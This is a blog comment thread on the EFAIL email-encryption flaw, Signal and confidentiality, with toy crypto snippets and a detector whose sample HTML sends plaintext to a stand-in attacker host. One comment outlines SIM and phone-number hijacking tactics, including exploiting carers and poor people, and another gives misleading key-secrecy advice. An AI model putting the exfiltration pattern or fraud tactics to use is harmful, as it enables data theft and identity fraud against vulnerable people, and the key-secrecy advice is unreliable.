Why is anyone using encrypted e-mail anymore, anyway? Reliably and easily encrypting e-mail is an insurmountably hard problem for reasons having nothing to do with today’s announcement. If you need to communicate securely, use Signal. If having Signal on your phone will arouse suspicion, use WhatsApp.

WhatsApp is from Facebook, which brute-forced a vanity onion address, allegedly with massive computing power, to create http://facebookcorewwwi.onion/

“Signal” is free and open source software. Nothing at all to arouse suspicion. There is no reason for me to believe that Signal would be secure in a situation when PGP-encrypted email allegedly is not.

Is there Perfect Forward Secrecy to the Signal app protocol? If so, I would like more discussion of the technical details.
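
To the question above: yes, Signal’s Double Ratchet provides forward secrecy by mixing a fresh ephemeral Diffie-Hellman exchange into each message key and discarding the private halves after use. A toy finite-field sketch of the underlying idea — Signal actually uses X25519 and a KDF chain, not this deliberately insecure small group:

```python
import secrets

# Toy group: a Mersenne prime modulus and generator 2. Real systems use
# X25519 or a vetted MODP group -- this is only to illustrate the idea.
P = 2**61 - 1
G = 2

def ephemeral_keypair():
    """Fresh per-message key pair; the private half is discarded after use."""
    priv = secrets.randbelow(P - 3) + 2
    return priv, pow(G, priv, P)

a_priv, a_pub = ephemeral_keypair()   # Alice, for this message only
b_priv, b_pub = ephemeral_keypair()   # Bob, for this message only

shared_a = pow(b_pub, a_priv, P)      # both sides derive the same secret
shared_b = pow(a_pub, b_priv, P)
assert shared_a == shared_b

# Deleting the ephemeral private keys is what buys forward secrecy:
# a later compromise of either device cannot reconstruct this secret.
del a_priv, b_priv
```

Long-term PGP keys lack exactly this property: one key decrypts every message ever sent to it, which is why recorded ciphertext “collected years ago” matters so much in the EFAIL scenario.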

Patriot May 16, 2018 3:57 AM

@ Clive Robinson

“You really should stop using HTML, especially HTML5 if you value any kind of security…”

True; this is just more evidence of a salient, ugly fact: generally, you cannot trust modern cryptography as it is offered to the masses. The math might be sound, but the implementations are easy to subvert.

Sancho_P is technically right in his banter above–this latest fire drill is not a weakness in PGP per se–but Mr. Schneier was just trying to make the message simple for the layman, something he is good at. Use what labels you like, the systems are unreliable.

Notice that Mr. Schneier’s support for Signal is not unconditional. When he says that he uses it, that gives people confidence. He recommends it, but it is not absolutely secure.

@ Mr. Schneier

“Why is anyone using encrypted e-mail anymore, anyway?”

Because, from the viewpoint of the attacker, that mobile device is a wonderful gift full of goodies, not to mention lots of metadata. It cannot be secured. It constantly emits electrons, the enemy of privacy and anonymity. It’s a security disaster in your pocket.

No one is talking about encrypting off-line in a cascade, which is a way that works. It is easier to encrypt off-line with an air-gapped computer, and move the ciphertext in a way that breaks the trail of electrons, than to use a phone in the same way. It is also easier to use steganography. True, not many law-abiding people need that level of security, but there are some.
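
Encrypting off-line in a cascade just means layering independent ciphers with independent keys, so that breaking one layer still leaves ciphertext. A toy sketch using SHA-256 in counter mode as the keystream (a real cascade would layer vetted ciphers such as AES and ChaCha20; the function names here are my own):

```python
import hashlib

def keystream_xor(key: bytes, data: bytes) -> bytes:
    """Toy stream cipher: SHA-256(key || counter) keystream XORed with
    the data. XOR is symmetric, so the same call encrypts and decrypts."""
    out = bytearray()
    counter = 0
    while len(out) < len(data):
        out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(b ^ k for b, k in zip(data, out))

def cascade_encrypt(keys, plaintext: bytes) -> bytes:
    ct = plaintext
    for k in keys:            # apply each independent layer in order
        ct = keystream_xor(k, ct)
    return ct

def cascade_decrypt(keys, ciphertext: bytes) -> bytes:
    pt = ciphertext
    for k in reversed(keys):  # peel the layers off in reverse order
        pt = keystream_xor(k, pt)
    return pt

msg = b"meet at the dead drop"
keys = [b"independent key one", b"independent key two"]
assert cascade_decrypt(keys, cascade_encrypt(keys, msg)) == msg
```

The point of the cascade is key independence: an attacker who recovers one layer’s key, or breaks one algorithm, still faces the other.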

Things that work are proper one-time pads and/or strong PGP keys on air-gapped systems and/or symmetric encryption with a strong passphrase used in the same manner. Or all of the above together. When cryptogeddon arrives, expect PGP traffic and passphrase-based symmetric traffic to be broken. In point of fact, we do not know whether that day has not already arrived.

If anyone wants to send some traffic and have it really remain confidential, it has to be properly encrypted/decrypted to/from secure endpoints, and that means going off the grid.

Depending on encrypted email alone is not enough, nor, for some, is depending on Signal, which is clearly more compromising in several important ways.

James May 16, 2018 4:43 AM

@UseSignal: Conversations is just an example. Using end to end encryption means that you don’t really need to trust the XMPP server, which does have access to your contacts and metadata. What I said is just an idea, far from perfect (just like everything else). Same old compromise between security and convenience.

Myself, I don’t want to rely on a phone and a phone number, period, and I want to access my chats from both mobile device and computer. Yeah, getting an SMS enabled phone number is easy. But still, I don’t like it. That’s just me.

Signal is a nice piece of software and was checked by several cryptography experts; I think it’s solid. Maybe at some point they won’t require a phone number, though.

Clive Robinson May 16, 2018 5:53 AM

@ M,

Regarding “end run attacks”: doesn’t this apply to any means of communication which displays the unencrypted text on a screen?

Yes, it applies to any system –not just Signal– where there is insufficient functional segregation, and where either the plaintext or KeyMat can be seen by an attacker who can get some kind of communications path to it. It’s a “red flag” I’ve been waving here and in other places for quite some time.

It’s why I talk about the “security end point” needing to be moved off of the device that is part of the communications path available to an attacker.

To put it more formally you need the security end point segregated from the communications end point and any transfer to be via a mandated choke point.

In effect you do encryption and decryption on an entirely separate system/device that does not have any kind of communications beyond the minimum mandated for the transfer of ciphertext to the communications end point. Further, the choke point is designed to be transparent to the user, such that they can see attempts by an attacker to reach across the choke point.

This is a hard thing to get right, and one of the reasons the likes of TEMPEST / EmSec approved equipment is so expensive, as closing down all inadvertent side channels means using various gapping technologies and significant testing.

It is fairly safe to say that no single consumer device is in any meaningful way secure from the likes of end run attacks. They lack any kind of effective internal segregation. Which means all consumer or COTS “smart devices” and more traditional computers are not sufficiently secure to be both communications and security end points.

To be secure with consumer / COTS systems means using appropriate gapping technology to establish full segregation, then carefully putting in place a mandated choke point of some form.

The simplest way to do this would be for users to have a secure pen and paper cipher or code (such as the One Time Pad or One Time Phrase systems). They write down the incoming ciphertext displayed on the communications end point device, and walk away out of range of any cameras, microphones etc. They then decode the message with the OTP, think of a reply, and hand encrypt/encode it. Then they destroy the pieces of paper with plaintext or KeyMat on them. They then take the reply ciphertext/codetext back to the communications end point, enter it, and send it.

Whilst that might sound a lot of work, it’s the way many secure field systems work even today.
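
The pen-and-paper arithmetic behind that procedure is simply addition mod 26: add the pad letters to encrypt, subtract them to decrypt. A minimal sketch (the security rests entirely on the pad being truly random, as long as the message, used once, and then destroyed):

```python
def otp(text: str, pad: str, decrypt: bool = False) -> str:
    """Letters-only one-time pad: A=0..Z=25; add the pad mod 26 to
    encrypt, subtract it to decrypt."""
    assert len(pad) >= len(text), "the pad must cover the whole message"
    sign = -1 if decrypt else 1
    shift = lambda t, p: chr((ord(t) - 65 + sign * (ord(p) - 65)) % 26 + 65)
    return "".join(shift(t, p) for t, p in zip(text.upper(), pad.upper()))

pad = "XMCKL"                 # would be truly random, used once, destroyed
ciphertext = otp("HELLO", pad)
print(ciphertext)             # -> EQNVZ
assert otp(ciphertext, pad, decrypt=True) == "HELLO"
```

Only the ciphertext ever touches the communications end point, which is exactly the segregation described above.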

Not maintaining good segregation/separation via appropriate methods such as gapping is the simplest way to allow your adversary to read your plaintext or KeyMat. Especially when you consider that with most modern communications and computers you no longer “own them”; somebody else does. Be it via a SIM or Security Enclave that allows the supplier of the service, device or OS to “set policy” over anything the user might decide…

However very few people can maintain the required level of discipline to continuously practice the level of OpSec needed to keep the security in place.

One area this happens in is Key Management (KeyMan); certain secure systems are also quite fragile. The One Time Pad has little or no security when the KeyMat is reused in part or in whole, so KeyMan has to be practiced very rigorously at all times, no matter how fast messages need to be sent or how tired the operators are…

Clive Robinson May 16, 2018 6:40 AM

@ Patriot,

It is becoming clear to increasing numbers of people that our information systems be it for communication, processing or storage are becoming more and more “insecure by design” at all levels in the computing stack.

It really does not matter if the insecurity is by deliberate design or the inadvertent consequence of “complexity”, or more likely “usability” or some other perceived “marketing advantage” such as “speed” or “bang for your buck”. Any insecurity, once known to certain people, will be used as “a crack to put the point of a wedge in”.

One of the downsides of even moderate complexity is working out where an insecurity lies and why it is insecure. This is especially difficult when “interoperability across an interface” is involved. Especially if the designers of the systems on either side of the interface are unrelated.

As for the flak our host @Bruce is getting from some quarters, it unfortunately happens as you become more prominent in any field of endeavor. As has been noted, “You can not please all of the people all of the time”, so almost as self defence you say less and less, but some people will always find fault. Especially when things are fluid in how they are perceived at any given point in time. Sometimes the judicious use of quote marks in titles or articles will make it clear that there is a difference between your thinking and the perception you are commenting on, but some will still find fault; such is the nature of the variety in humans.

As I’ve explained above, security is hard, and maintaining the discipline to keep it requires abilities that many will lack, for a whole heap of reasons. It’s not helped when others with financial or other incentives put pressure on the people who create standards. We have seen this with the NSA and NIST, and with various interests such as Alphabet and the W3C. I’m not sure it can be stopped, but it can be called out and greater awareness raised in the general population. Thus people have some degree of choice.

If you look back on this blog you will find I decided I would no longer entertain either JavaScript or cookies on my Internet facing devices. At first I was told I was being a little extreme, or losing opportunities etc., even of attacking web developers… Now, however, with the glut of advertising malware etc., more people are stopping using the likes of JavaScript. As you might have seen, there has been quite some pushback from various “self interested parties” who see their income being taken away from them. However, the numbers using ad-blockers or just turning off JavaScript are rising, so awareness is starting to spread. The result, however, has been the arm twisting of the W3C. Whilst some will use HTML5, hopefully not just the users but web browser developers will gain awareness and take action by disabling many of the stranger HTML5 features that are major security and privacy circumventing issues.

So yes, it’s a battle, but at least in some quarters the users are fighting back and winning.

Ari Trachtenberg May 16, 2018 11:06 AM

The vulnerability isn’t with PGP or S/MIME itself
Not quite … they appear to make use of the malleability of both ciphers’ modes (CBC in S/MIME, CFB in OpenPGP).

Nick P May 16, 2018 4:27 PM

@ Vuln in Implementation, Not in Encryption

Nice, simple setup you had going on there. I’ll save it in my GPG collection for if I get around to doing an automation attempt. Yeah, key management is the weakest link for a lot of organizations. At least you didn’t have as much plaintext flying around or in storage. A side effect of such approaches, if all secrets are encrypted/decrypted in RAM, is that disk disposal is less of a problem. Just gotta make sure stuff like swap is off or itself encrypted.

@ vensi and all about Signal phone number

You all might like lattera’s trick. He sets Signal up with burner phone/SIM, gets rid of SIM, turns off cellular connection, and uses it over WiFi behind Tor network. Brilliant cheat around the problem. 🙂

Solves part of the problem anyway.

Mike Acker May 16, 2018 4:51 PM

the problem is in the e/mail RFC

if you are going to use pgp/mime there should be only 1 segment in the e/mail: the pgp/mime part.

now we have messages that contain multiple parts. this is WRONG — but — easy to fix: if there is a PGP/MIME part in the message then that should be processed as a separate message — not stitched together
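
The strict shape Mike Acker is asking for is essentially what RFC 3156 already defines for PGP/MIME: a multipart/encrypted message with exactly two parts and nothing else. A hedged sketch of how a client could verify that shape before rendering anything, using only Python’s stdlib email parser (the function name is my own):

```python
from email import message_from_string

def is_strict_pgp_mime(msg) -> bool:
    """RFC 3156 shape check: a multipart/encrypted message with exactly
    two parts -- the version part and the encrypted payload -- and
    nothing else stitched alongside them."""
    if msg.get_content_type() != "multipart/encrypted":
        return False
    parts = msg.get_payload()
    return (isinstance(parts, list) and len(parts) == 2
            and parts[0].get_content_type() == "application/pgp-encrypted"
            and parts[1].get_content_type() == "application/octet-stream")

raw = """\
Content-Type: multipart/encrypted; protocol="application/pgp-encrypted";
 boundary="b1"

--b1
Content-Type: application/pgp-encrypted

Version: 1

--b1
Content-Type: application/octet-stream

-----BEGIN PGP MESSAGE-----
...
-----END PGP MESSAGE-----

--b1--
"""
print(is_strict_pgp_mime(message_from_string(raw)))  # -> True
```

The EFAIL “direct exfiltration” variant works precisely by wrapping the encrypted part in extra sibling MIME parts, which a check like this would reject.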

Clive Robinson May 16, 2018 10:17 PM

@ Mike Acker,

now we have messages that contain multiple parts. this is WRONG

You would think so, but the fact that it’s allowed in many, many plaintext email systems should tell you why it also happens in ciphertext systems without thought or comment…

It’s the old notion of “least surprise” for users. Or to put it another way, it’s “backwards compatibility” writ large, without thought to the implications for security…

As a few regular readers know, I have a “bit of a bee in my bonnet” about the security issues of “backwards compatibility”, and this is yet another example to add to the list of why you should not offer “backwards compatibility”, especially when “non standard features” are involved.

That said, it’s difficult to sell a product that is not “backwards compatible” into what is a “mature market”. This is especially true of security products; users rarely see the benefit in security, because they see it as getting in the way of productivity. Likewise “marketing” know that not working the way people expect is at best a difficult sale, at worst a company heading for bankruptcy.

It’s stupid, but then who would ever consider “lowest common denominator thinking” as anything but “Not very bright”…

Until of course they meet a real issue. Such as “which side of the road do you drive on?”. In the UK drivers drive on the other side of the road to Europe. The principle of “least surprise” suggests that the UK should have swapped sides… At first it appears easy to do… Then somebody mentions “buses” and then “it all goes pear-shaped”… It’s an issue that those designing standards (which RFCs are) should deal with from before day zero. But frequently they do not, hence things like “assumptions” get built in, and down the road those assumptions cause real problems that could have been avoided prior to day one. Many of the early RFCs have this problem, which is why later RFCs are overly complicated. Thus complexity goes up and security goes down…

Patriot May 17, 2018 2:40 AM

@ Clive Robinson

“It is becoming clear to increasing numbers of people that our information systems be it for communication, processing or storage are becoming more and more “insecure by design” at all levels in the computing stack.

It really does not matter if the insecurity is by deliberate design or the inadvertent consequences of “complexity” or more likely “usability” or some other perceived “marketing advantage” such as “speed” or “Bang for your buck”. Any insecurity once known to certain people will be used as “a crack to put the point of a wedge in”.

One of the downsides of even moderate complexity is working out where an insecurity lies and why it is insecure. This is especially difficult when “interoperability across an interface” is involved. Especially if the designers of the systems on either side of the interface are unrelated.”

Well said.

About Mr. Schneier: he is not only prominent as a cryptographer of the first rank, and as an important computer security specialist, but he is also a very good writer. I find his books on technology very informative and enjoyable to read. Moreover, something that people may not often consider is that it takes guts to be such a widely respected figure and put on the front page of your blog, “How the NSA Threatens National Security”. He’s in the front. He is benefiting the U.S. in a powerful way, in something that is really needed right now.

Why is that?

Al Qaeda wanted to attack the U.S., and they did. They killed a lot of people and did some significant physical damage. But they could not deal a death blow to the center of America’s power, which is in its law. Once the U.S. Constitution is subverted, take that how you will, then more damage will have been done to the U.S. than AQ ever hoped to do. Perhaps some U.S. leaders are benighted and they have not yet figured this out. That is why we need to talk about privacy, illegal search and seizure, trust, the bogus “Patriot Act”, free communication, agencies staying in their lanes, encryption, etc., so we do not creep into America becoming unrecognizable, a police state in which the people are no longer sovereign.

Once America goes, others will follow.

Clive Robinson May 17, 2018 3:21 AM

@ Nick P,

You all might like lattera’s trick.

It was a sensible way to go about things, other than making an occasional “Keep Alive” call.

Unfortunately most countries now have cracked down on “burner SIMs” which means it’s now harder to get your hands on one.

That said, there are other ways of getting a SIM. One way is to go on holiday to a country that has not yet cracked down on them; the downside is making the “keep alive” calls. A couple of years ago the service providers only required one chargeable call within six months; now some want them as frequently as once every week or two.

A second trick, which could be combined with the first, is in effect to “roll a drunk” or similar, where you give someone on the bottom stratum of society the price of a bottle or two of spirits to get you a pre-pay SIM using their details / ID. Most Western countries have not yet cracked down on this, but no doubt they will do if they find a way that works.

But there is another way, which surprises many people in just how easy it is to do. Put simply, you “buy out a contract”. There are lots and lots of people who want to “jump contracts” to get a new phone in less than two years. Some are daft enough, when “second handing” their “old phone”, to take a few extra quid to sell the SIM and contract on… Some can even be easily conned into it as part of the “upgrade process” and pay someone to take the old contract off their hands…

The only difficult part of all these methods is ensuring that the minimum payments go through so the “keep alive” happens. Because in the UK and some other countries, numbers that are not “kept alive” are recycled increasingly quickly these days, and that could be problematic if the new number holder decides to register for the same service…

It’s this last point people really should be aware of: the “authorities” can grab your electronic phone number (not your hardware number / serial number) quite legally whenever they like, and that will give them access to the service…

Which brings us onto a more technical attack, which is to steal an active phone number… As many people know, getting at “call center staff” with “social engineering”, or redirecting a phone via SS7, is not as difficult as it could be.

Further, on the “identity theft” and other criminal acts side of things, “borrowing an old dear’s phone” whilst they are in hospital etc. is fairly easy to do. There is a large, fairly easily recognisable demographic of people who will not use their mobile for anything other than receiving calls from relatives or “social service” providers, making a few calls or sending a few SMS messages. Thus getting control of their phone for the short period of time needed to register for one of these online services will work quite easily. For instance, there are a lot of people called “carers” who are on minimum wages at best and who can be persuaded to “steal the phone number” for a few quid, especially if they are “agency carers” where many different carers might see one “contracted client”. There are other “social groups” as well: those at or below the “bread line” are fairly easy prey, and then there are those in “relationships” where the partner gets them a nice new phone as a present etc. and cons them into the contract, then uses that as a stepping stone for various levels of identity theft. This latter method has been a way for various con artists etc. to get leverage to build up all sorts of scams, which are easily aided by the likes of utility companies doing “online payment” and not checking who is actually paying the bill, just as long as payment comes in…

Such tricks can also be used to “set people up” as has been seen in a couple of murder cases. Likewise those in terrorist organisations can use the techniques to setup others so they can send “bombs by UPS” and the like…

So really, the idea of requiring ID to register for a phone service only affects the “honest” and “unfortunate”; the likes of petty criminals, con artists, organised crime and terrorists all know how to get around the silly rules.

Clive Robinson May 17, 2018 10:55 AM

@ Patriot,

First off, thank you for the kind words about @Bruce, I wonder if his ears will go / have gone pink when he read(s) it 😉

Once America goes, others will follow.

Sadly America appears to be playing “follow the leader” as both Australia and the UK have harsher rules currently.

Oh, and the UK treats the whole world as its jurisdiction when it comes to electronic communication. That is, under RIPA and later legislation the UK has made it clear it has the right to attack / put malware on / surveil / etc. any electronic device it can reach from any UK network… Which, put simply, means any system they can connect to directly, or indirectly, say after a “black bag job” or similar…

It’s why a previous regular, @Figureitout, was looking into using long distance etc. radio networks based around narrow band, low power –QRP or less– digital communications protocols like PSK31, running not on PCs or other common OS systems but ultimately on microcontrollers with bespoke software.

Unfortunately, due to things we do not currently understand about sunspot and other solar activity, the sun is approaching a minimum lower than we have past records for. With the result that the ionosphere is not being ionised by “space weather”, both the “Critical Frequency” and “Maximum Usable Frequency” have dropped significantly, effectively closing all but a couple of the lowest amateur HF bands; thus DX / skip working is mainly non functional.

As this has a significant effect on both military and maritime communications[1], it is quite likely those in that arena will push to get access to the quite small ham/amateur allocation, either as the primary user or exclusive user[1].

But it gets worse. Due to falling membership and other things, like being increasingly seen as non representative, the senior ARRL leadership have been engineering both a “land and power” grab via false representation to the US FCC[2]. If they succeed they will effectively kill off most aspects of the amateur ethos and freedoms. Whilst they might gain more members initially from “day boat sailors and similar”, the ARRL will lose those new members fairly quickly when they wake up and realise the ARRL and certain backing interests have lied to them big time…

Thus in the US threats to your freedom to communicate can come from unexpected directions and knock you for six even before you can comprehend what the real game plan is…

Oh, it’s not just Pactor where there is a hidden but lucrative commercial interest involved. Some of the digital modes use proprietary codec algorithms on which there are significant licensing fees. To prevent people avoiding these, those with a significant financial interest only allow the algorithms to be hidden in silicon they produce / control. Some estimates have put this level of financial interest at not far short of 100USD per chip. Bearing in mind you can now buy reasonable dual band VHF/UHF transceivers for as little as 20USD, you can see what the financial motivation is behind this sort of behaviour…

[1] The military and maritime communications mainly use very localised “ground wave” or, out to 200-600Km, Near Vertical Incidence Skywave (NVIS) working, not DX / skip working. NVIS working is only possible below the Critical Frequency; with that down to the very bottom of the HF band, they will be looking for any capacity they can grab below 1.5-7MHz, which covers the amateur 160, 80 and 40 meter bands. Further, due to the size needed for the antennas (40/20/10 meters), their current 4 meter whips are grossly inefficient, thus they will want all other users out of those bands… As both the military and marine interests can claim direct or secondary “National Security”, the chances are that if pushback does not start before they do, they will win any argument…

[2] Worse, the ARRL are up to some quite harmful shenanigans with the FCC. Put simply, on the quiet they have claimed to represent all amateurs, whether US or not, and have proposed turning nearly all the amateur HF allocation into “wideband data usage”. Whilst this appears at first to be benign, it is far from it. It’s being pushed by certain self interested parties behind the use of royalty-only PACTOR for WinMail. Idiot dayboat sailors have been promised that if they get a basic licence they will be able to use it for free, rather than pay, as they currently do, quite high fees for a very small data allocation. To see just how much of an idiot these dayboat sailors are, some are on record as saying how it will allow them to do streaming media and other very high data use such as web browsing. That is, they do not realise just how long it would take at 960 bytes/sec to download the average web page of three megabytes (roughly an hour)… Worse, the way the WinMail and similar nodes work, they will be regarded as “automatic”, which means they get the same “clear channel” rules as VHF and UHF repeaters, which means that an entire full bandwidth channel has to be reserved at the maximum working range… Which, due to rules peculiar to the FCC and US Gov, effectively reserves the channels world wide, as other countries’ amateurs are not allowed to use WinMail or similar Internet services or they will not be allowed to work maritime mobile. As I said, the ARRL, who do not even represent the majority of US hams, tried to do this land/power grab via the FCC on the quiet. However, one senior member of the ARRL tried to go public and was immediately suspended, vilified behind their back, and threatened with significant legal consequences if they even tried to defend their good name… So the current seniors in the ARRL appear not to be the sort of people who represent anyone other than their own self interest…

lwb May 17, 2018 1:48 PM

“if you are going to use pgp/mime there should be only 1 segment in the e/mail: the pgp/mime part.”

One case where I might want it to be otherwise is if I’m forwarding several separate PGP messages to someone (inside an encrypted container, or attached to a plaintext message). Maybe I don’t even have the private key on the computer holding those messages. Treating them as separate messages would be as expected.

“The principle of ‘least surprise’ suggests that the UK should have swapped sides to drive on… At first it appears easy to do… Then somebody mentions ‘busses’ and then ‘it all goes pear shapped’.”

Search for “H-day” if you don’t already know it. The phaseout of petrol vehicles, including buses, will give the UK another chance to switch.

Ruby May 18, 2018 1:27 AM

Multiple people have advised their readership to stop using email and PGP and use Signal instead. This isn’t very helpful for people who don’t use a smartphone (which Signal requires).

What should they use for confidential communication?

Tune May 18, 2018 2:06 AM

I don’t think the issue is with HTML rendering per se, but with the HTML referencing non-local resources. Rendering a PNG or JPEG from a multipart attachment should not be a problem, but having your mail client blindly fetch remote content always leaks information. This is a problem with unencrypted email too, for instance with tracking pixels in bulk spam campaigns. The only trusted origin for email content should be the email itself; and in the case of encrypted email, only the encrypted (or at least authenticated) parts.
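
A minimal sketch of the kind of check a mail client could apply before rendering HTML: flag any attribute value that would trigger a network fetch. This uses only Python’s stdlib HTML parser, and the class name and attribute list are my own illustrative choices, not an exhaustive set:

```python
from html.parser import HTMLParser

class RemoteRefFinder(HTMLParser):
    """Collect attribute values that would cause the client to fetch a
    remote resource when the HTML is rendered."""
    FETCH_ATTRS = {"src", "href", "background", "poster"}

    def __init__(self):
        super().__init__()
        self.remote_refs = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if (name in self.FETCH_ATTRS and value
                    and value.lower().startswith(("http://", "https://", "//"))):
                self.remote_refs.append(value)

html = '<p>hi</p><img src="https://attacker.example/leak?pt=secret">'
finder = RemoteRefFinder()
finder.feed(html)
print(finder.remote_refs)  # the exfiltration URL a client must refuse to fetch
```

A `cid:` reference to a local multipart attachment would pass this check, which matches the point above: local images are fine, remote fetches are the leak.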

Michael Thomas May 18, 2018 4:50 AM

” If you need to communicate securely, use Signal. If having Signal on your phone will arouse suspicion, use WhatsApp.”

No, absolutely not. With both, I don’t hold any key of my own; I have to trust the programmer. It’s like renting a house where, every time I want to get in, another person opens and closes the door for me. Yes, it’s comfortable, but it’s not secure. Do I know whether that person lets somebody else into the house?

On the other hand: I don’t use WhatsApp or Signal. I use Threema (partly, and not with the feeling of being secure). If I want to send a message to a Signal or WhatsApp user, somebody has to transfer it (that means: copy and paste). Not very secure, and absolutely “19th-century telephone” usage.

We are in the 21st century and we have the technology to communicate without company or state borders. We can use e-mail, XMPP/Jabber and Matrix as open implementations. Of course, to be free in a democratic manner you have to do something so as not to end up in the golden cage of a “door opener” holding your private key.

Clive Robinson May 18, 2018 5:12 AM

@ Ruby,

What should they use for confidential communication?

Sorry, wrong question, due to an incorrect assumption on your part.

The first thing you should ask is “What do I mean by confidential?”. That normally gets broken down into message content (data) and message routing (metadata). During WWII two people at Bletchley Park became influential on the way our modern communications networks work, and on the associated deliberately inbuilt security flaws.

Currently, whilst it is possible to get message content “data confidentiality” by careful use of a limited set of codes and ciphers, it’s not possible to have message routing “metadata confidentiality” on publicly accessible commercial networks.

That is, “traffic analysis” of routing and other aspects of metadata over time reveals much more information than individual message content data.

Even Tor is fairly ineffective at dealing with “traffic analysis”, due to its rather ineffective basic design (what do you expect from a US Gov intelligence agency freebie…).

That is not to say that Tor or a “mix-net” could not be fixed. I’ve made this point quite a number of times in the past, including what changes would be required to stymie traffic analysis by SigInt and LE agencies using their current “collect it all” techniques, and in the process force SigInt agencies to use their resources very differently, back to the way they had to when “collect it all” was not yet technically feasible.

So your assumption that “confidentiality” is available to the general public is currently incorrect…

Thus the question becomes “What do you as an individual intend to do to change the current situation?”, that is, “Really, just how important is confidentiality to you, and what lengths are you prepared to go to to get it?”.

Sorry to sound nasty; I’m not intending to. But having had my nose up close to the grindstone developing confidential systems, the reality is that nobody is prepared to put their money on the table until after the brown stuff has hit the industrial blower big style. Which means that the resources that might give everybody increased confidentiality instead get to fill the endless black holes of the coffers of our legal brethren, who like sharks are always circling in an opportunistic manner to capitalise on weakness and distress…

At the end of the day resources are finite; you and everybody else have to choose –where you can– what you will use your limited resources on…

Clive Robinson May 18, 2018 6:22 AM

@ Tune,

I don’t think the issue is with HTML rendering per se, but with the HTML referencing non-local resources.

Whilst that is true from a 20,000ft view, HTML does not render itself; that is subbed out, for the web browser developer either to build in or to attach code that does, whether by an Inter-Process Communication (IPC) mechanism or by linking to a third-party code library. Following a URL, however, has always been an inbuilt function of the HTML interpreter, designed to be fully built into the browser core functionality.

That is, HTML used to separate function and method, for quite valid reasons. Thus viewing rich content –such as PDFs and images– or using a programmable language was entirely separate, fully removable or replaceable, which is a major security advantage. The W3C, however, under pressure from less than trustable entities, has pulled more and more methods into HTML than should be there. HTML5 is extraordinarily bad in this respect, thus a security nightmare that will haunt us for at least the next decade or two…

Thus the inability to remove a method and its complexity is a major security failing. Worse, as you note, such failings have likewise been dragged into email clients (MUAs), to the detriment of security.

The major issue is “confidentiality” in both content (data) and associated functioning (metadata). Whilst encryption “could” give data confidentiality via the use of PGP or any other cipher, as you note, any email client that supports core HTML functionality will always leak metadata.

Unless, that is, the client designers and developers allow users to turn the linking functionality off. Which, many users are now realising, is getting closer and closer to being impossible, due to the W3C, browsers and developers having major dependencies on those who are less than trustworthy…

Thus we are now very much in the “He who pays the piper calls the tune” dystopia of the giant privacy abusers such as Alphabet/Google, Facebook et al.

Whilst on the face of it FOSS gives the potential for “freedom” and “privacy”, the reality is that for “pocket fluff change” we’ve all been converted into “commodities” by the less than trustworthy…

Which just leaves the pertinent question, for the few, of “How do we get out of this trap?”, the answers to which will almost certainly be thwarted by the masses who want “free lunch baubles, bells and whistles” with no consideration as to what the ultimate price really is…

We thus have a new “opiate for the masses” that, as with the original opium triangle, just exploits over and over at an almost incalculable cost to society…

Yup it sounds depressing, but the reality is as we can see the death toll of social media is rising faster than the rate of new users joining… Which does not bode well for the future…

mark May 18, 2018 8:08 AM

Why do you recommend WhatsApp?

Isn’t that read by Facebook and transmitted to state officials?

Alyer Babtu May 18, 2018 2:36 PM


Unless the user client designers and developers allow the users to turn the linking functionality off

Could a browser limited to essentially pure text, perhaps with a provision to render the graphic content of pictures/images, and also including secure commercial-transaction capability, function today?

I recall how amazingly more efficient in machine execution and human comprehension pure text browsers were. Page and link structure immediately apparent.

Text with judicious addition of images is a proven technology with a multi-thousand year track record.

Clive Robinson May 18, 2018 6:29 PM

@ Alyer Babtu,

Could a browser limited to essentially pure text … function today?

Short answer: the oldest web browser still in production, Lynx, does; and a week ago the developers released the latest test release.

The long answer is that it’s less about browser capability and much more about page garbage content. With worse-than-code-cutters masquerading as web developers, they really can write the worst code imaginable in your worst nightmare. Some is not just “write only” code; you can tell it’s been scraped from a number of Stack Exchange posts without any kind of understanding…

But they get worse, a lot worse than that… For instance, I have JavaScript disabled by default in my browser; you would be amazed at just how many web sites do absolutely nothing, not even an error message, just a blank white page, or worse go download-code crazy via an infinite regression of redirects (Rupert Murdoch newspapers being some of the worst of the worst)… Such coding is not just incompetent, it’s negligent beyond doubt, and most definitely brings the organisation into disrepute, which is normally a sacking offence.

But still worse it gets: I can remember a time when people were getting worried about web pages because the average size had crossed 10 kilobytes. Now the average is over three megabytes, and the actual textual content for humans has dropped below one kilobyte…

But to prove how bad those web designers are, we can compare their work against the web pages of this blog. This blog does not need either JavaScript or cookies enabled by the user. Last time I checked, the pages did not load code in just by displaying one of the mega-corp buttons. More importantly, these pages still function as most users would expect: mostly quickly and efficiently, with a lack of errors, but importantly, error messages are included where needed. That is, these pages are what you would not just like but should expect as a minimum by default; that is, they cause “least surprise” for a user.

I’ve not tried it, but I’ve been told these pages also work via Lynx both via the user interface and via the CLI / scripting interface…

echo May 21, 2018 12:39 PM

@Clive Robinson

Yes, I have noticed these things too. I suspect the Windows code base and most beaurocracies function along similar lines.

One day I will learn to spell “bureaucracy” correctly.

RockLobster May 24, 2018 11:28 AM

Here is a warning for everyone using public key encryption.

I’m going to give you a scenario.
If you were Big Brother, and you knew the ciphertext itself is secure and the only known attacks against public-key encryption were against the public key itself, what would you do?

Common sense would say: coerce users of public-key encryption into uploading their public keys to a database, so that should you wish to target any individual you can easily retrieve their public key and work on cracking it. Also, try to prevent the public from using public keys so large that they are not crackable.

So now let’s consider the implementations of public-key encryption –PGP, OpenKeychain, etc.– and what they advise in that regard.
Well, surprise surprise, none of them advise you to keep your public key secure and share it only with those you communicate with.
They all advise linking your public key to your name and email address and uploading it to public key servers.

I was recently reading forum posts about OpenKeychain; someone said that soon they will be making the uploading of keys to key servers mandatory.
Then on the issue tracker I read that when a user unchecked the option to upload new keys to a key server, OpenKeychain re-checked it by itself and uploaded them regardless.
Then I read discussions by the developers about removing the option to create large RSA keys, bigger than 4096 bits, which they did.

For the above reasons I strongly suspect at least one of the developers is working for Big Brother.
My advice is: use a publicly published public key for introductory purposes only, then switch to using large public keys that are kept offline and encrypted; share them only with those you communicate with, and replace them often.
Ideally the public keys should be shared while encrypted, and the password shared by other means.

Ron Dam May 27, 2018 10:36 AM

@ Clive Robertson.

You’re right, the core question is what confidentiality really means.

